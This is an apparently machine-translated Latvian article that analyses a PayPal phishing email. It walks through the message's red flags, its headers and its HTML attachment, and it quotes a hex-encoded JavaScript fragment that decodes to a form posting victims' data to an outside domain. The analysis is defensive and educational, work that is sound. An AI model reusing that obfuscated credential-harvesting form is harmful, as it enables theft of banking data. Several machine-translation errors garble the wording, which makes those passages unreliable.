Šodienas pasaulē, kur ikviena informācija ir tiešsaistē, pikšķerēšana ir viens no populārākajiem un postošajiem tiešsaistes uzbrukumiem, jo jūs vienmēr varat tīrīt vīrusu, bet, ja jūsu bankas informācija ir nozagta, jums ir problēmas. Lūk, šāda viena uzbrukuma sajaukšana.
Nedomājiet, ka svarīgi ir tikai jūsu bankas dati: galu galā, ja kāds iegūst kontroli pār jūsu konta pieteikšanos, viņi ne tikai zina šajā kontā esošo informāciju, bet šķiet, ka tā pati pieteikšanās informācija var tikt izmantota dažādos citos konti. Ja viņi kompromitē jūsu e-pasta kontu, viņi var atiestatīt visas citas jūsu paroles.
Tātad papildus spēcīgu un mainīgu paroļu saglabāšanai jums vienmēr ir jācenšas maldināt e-pastus, kas maskējas kā reālā lieta. Lai gan lielākā daļa pikšķerēšanas mēģinājumu ir neprognozējami, daži no tiem ir diezgan pārliecinoši, tāpēc ir svarīgi saprast, kā tos atpazīt virsmas līmenī, kā arī to, kā viņi strādā zem kapes.
Asirapa attēls
Mūsu e-pasta piemērs, tāpat kā vairums pikšķerēšanas mēģinājumu, "paziņo" par jūsu PayPal konta darbību, kas parastos apstākļos varētu būt satraucoša. Tādēļ aicinājums rīkoties ir pārbaudīt / atjaunot jūsu kontu, iesniedzot gandrīz katru personisko informāciju, kuru jūs varat domāt. Atkal, tas ir diezgan formulīgs.
Lai gan noteikti ir izņēmumi, gandrīz katrs pikšķerēšanas un krāpšanās e-pasts tiek ielādēts ar sarkanajiem karogiem tieši pašā ziņojumā. Pat ja teksts ir pārliecinošs, jūs parasti varat atrast daudzas kļūdas, kas pakļautas visā vēstījuma ķermenī, kas norāda, ka ziņojums nav likumīgs.
Ziņojuma struktūra
No pirmā acu uzmetiena šis ir viens no labākajiem pikšķerēšanas e-pasta ziņojumiem, kurus esmu redzējis. Nav pareizrakstības vai gramatisko kļūdu, un verbiage skan atbilstoši tam, ko jūs varētu gaidīt. Tomēr ir daži sarkani karodziņi, kurus jūs varat redzēt, nedaudz detalizētāk izpētot saturu.
Ziņojuma galvene
Apskatot ziņojuma galveni, parādās pāris sarkani karodziņi:
Pielikums
Kad es atveru pielikumu, jūs varat uzreiz redzēt izkārtojumu nav pareizi, jo trūkst informācijas par stilu. Vēlreiz, kāpēc PayPal nosūtītu e-pastu uz HTML formu, kad tās varēja vienkārši pievienot saiti savā vietnē?
Piezīme: Šajā nolūkā mēs izmantojām Gmail iebūvēto HTML pielikumu skatītāju, taču mēs iesakām jums NEPILNOTIES pielikumus no scammers. Nekad Jebkad Tie ļoti bieži satur ekspluatācijas, kas datorā ļaus instalēt trojanus, lai nozagtu jūsu konta informāciju.
Ritinot nedaudz vairāk, jūs varat redzēt, ka šī veidlapa tiek pieprasīta ne tikai mūsu PayPal pieteikšanās informācijai, bet arī informācijai par bankas un kredītkarti. Daži attēli ir salauzti.
Tas ir acīmredzams, ka šis pikšķerēšanas mēģinājums notiek pēc viss ar vienu pietuvošanos.
Lai gan tam jābūt diezgan skaidram, pamatojoties uz to, kas ir redzams, ka tas ir pikšķerēšanas mēģinājums, mēs tagad gatavojamies sadalīt e-pasta tehnisko sastāvu un redzēt to, ko mēs varam atrast.
Informācija no pielikuma
Pirmā lieta, kas jāņem vērā, ir pielikuma veidlapas HTML avots, kas sniedz datus viltus vietnē.
Ātri aplūkojot avotu, visas saites tiek rādītas derīgas, jo tās norāda uz "paypal.com" vai "paypalobjects.com", kas abi ir likumīgi.
Tagad mēs apskatīsim kādu pamata informāciju par lapu, ko Firefox apkopo lapā.
Kā redzat, dažas no grafikām tiek izvilktas no domēniem "blessedtobe.com", "goodhealthpharmacy.com" un "pic-upload.de", nevis legitos PayPal domēnos.
Informācija no e-pasta virsrakstiem
Tālāk mēs apskatīsim neapstrādātās e-pasta ziņu galvenes. Gmail to dara pieejamu, izmantojot ziņojuma opciju Rādīt sākotnējo izvēlni.
Aplūkojot oriģinālā ziņojuma galvenes informāciju, jūs varat redzēt, ka šis ziņojums tika izveidots, izmantojot programmu Outlook Express 6. Man ir šaubas, ka PayPal ir personāls, kas personīgi sūta katru no šiem ziņojumiem manuāli, izmantojot novecojušo e-pasta klientu.
Tagad, aplūkojot maršrutēšanas informāciju, mēs varam redzēt gan sūtītāja, gan pārsūtīšanas pasta servera IP adresi.
Lietotāja IP adrese ir sākotnējais sūtītājs. Veicot ātru IP informācijas meklēšanu, mēs varam redzēt, ka nosūtīšanas IP atrodas Vācijā.
Un, aplūkojot e-pasta servera (mail.itak.at), IP adresi, mēs redzam, ka tas ir ISP, kas atrodas Austrijā. Es šaubos par to, ka PayPal maršrutē savus e-pastus tieši ar Austrijas interneta pakalpojumu sniedzēja starpniecību, ja viņiem ir liela serveru fermā, kas varētu viegli izpildīt šo uzdevumu.
Kur notiek datu pārsūtīšana?
Tāpēc mēs esam skaidri noteikuši, ka šis ir pikšķerēšanas e-pasts un ir apkopota informācija par to, no kurienes tika izveidots ziņojums, bet kā par to, kur tiek nosūtīti jūsu dati?
Lai to aplūkotu, mums vispirms vispirms jāuzglabā HTM pielikums, vai mūsu darbvirsma ir atvērta teksta redaktorā. Pārlūkojot to, šķiet, ka viss ir kārtībā, izņemot gadījumus, kad mēs nokļūstam aizdomīgu meklējamā Javascript blokā.
Izņemot pilnu Javascript bloka avotu, mēs redzam:
// Autortiesības © 2005 Voormedia - WWW.VOORMEDIA.COM
VAR i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; (i = 0; i<>
Jebkurā brīdī jūs redzat lielu pārblīvētu virkni šķietami izlases burtus un ciparus, kas iegulti Javascript blokā, parasti tas ir kaut kas aizdomīgs. Aplūkojot kodu, mainīgais "x" tiek iestatīts uz šo lielo virkni un pēc tam dekodēts mainīgā lielumā "y". Pēc tam mainīgais "y" beigu rezultāts tiek ierakstīts dokumentā kā HTML.
Tā kā lielā virkne sastāv no skaitļiem 0-9 un burtiem a-f, visticamāk, to kodē ar vienkāršu ASCII uz Hex konversiju:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Pārveido:
Tas nav nejaušība, ka tas tiek dekodēts par derīgu HTML formas tagu, kas nosūta rezultātus nevis uz PayPal, bet gan uz negodīgu vietni.
Turklāt, kad skatāt veidlapas HTML avotu, jūs redzēsiet, ka šīs veidlapas tags nav redzams, jo tas tiek ģenerēts dinamiski, izmantojot Javascript. Tas ir gudrs veids, kā slēpt faktu, ko HTML patiešām dara, ja kāds vienkārši skatītu izveidotā pielikuma avotu (kā mēs to darījām agrāk), nevis tieši atvērt pielikumu teksta redaktorā.
Mēs varam redzēt, ka tas ir domēns, kas mitināts tautas tīmekļa uzņēmējā 1and1.
Kas izceļas, domēns izmanto lasāmu nosaukumu (pretēji tam, kas līdzīgs "dfh3sjhskjhw.net"), un domēns ir reģistrēts 4 gadus. Tāpēc es uzskatu, ka šis domēns tika uzlauzts un tiek izmantots kā pietotājs šajā pikšķerēšanas mēģinājumā.
Kad runa ir par drošu uzturēšanos tiešsaistē, tas nekad neļauj sāpināt ciānismu.
Lai gan esmu pārliecināts, ka e-pasta piemērā ir vairāk sarkano karodziņu, tas, ko mēs esam minējuši, ir rādītāji, kurus mēs redzējām pēc dažām pārdomu minūtēm. Hipotētiski, ja e-pasta virsmas līmenis atdala tā likumīgo ekvivalentu 100%, tehniskā analīze joprojām atklās tā patieso būtību. Tāpēc importēšana ļauj pārbaudīt gan to, ko jūs varat un ko nevarat redzēt.
